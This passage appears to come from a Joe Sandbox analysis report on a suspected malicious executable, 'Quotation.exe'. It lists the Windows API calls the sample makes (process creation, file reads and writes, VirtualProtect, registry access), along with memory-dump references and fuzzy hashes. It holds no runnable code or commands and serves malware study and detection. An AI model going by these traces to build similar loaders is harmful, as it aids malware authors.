                                                                  • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                • String ID:
                                                                • API String ID: 1879705256-0
                                                                • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID:
                                                                • API String ID: 3712363035-0
                                                                • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 0d1ab4eff235889299f8cc1d0edb78ca0b0841bccf14691be9df926a659609b3
                                                                • Instruction ID: 023b053b4c7ad8aa26299da49413a3150aeb93969799a1b3d4d9bb5af7159f53
                                                                • Opcode Fuzzy Hash: 0d1ab4eff235889299f8cc1d0edb78ca0b0841bccf14691be9df926a659609b3
                                                                • Instruction Fuzzy Hash: 574161B6D0060BDFF730AF65EA85F4937B9EB18354FF4442AE509CA260D63896428BC1
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(733F501C,00000004,00000040,733F5034), ref: 733F1A68
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: ea9be91a8aca9234afa97364a07a9101d360bd9ea37b8ed032464c8a5ac2a472
                                                                • Instruction ID: 8e07c048028e70d4f33079a76f44fc87acfc94ed0c4cb5a0a6cb943023e87d43
                                                                • Opcode Fuzzy Hash: ea9be91a8aca9234afa97364a07a9101d360bd9ea37b8ed032464c8a5ac2a472
                                                                • Instruction Fuzzy Hash: 2CF098F2919743EBE338AF1A94447057AA8F718344BA0452FF65DDA340C33842009B9A
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                APIs
                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                • wsprintfA.USER32 ref: 00406363
                                                                • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                  • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                  • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]
                                                                • API String ID: 2900126502-461813615
                                                                • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406D90
                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
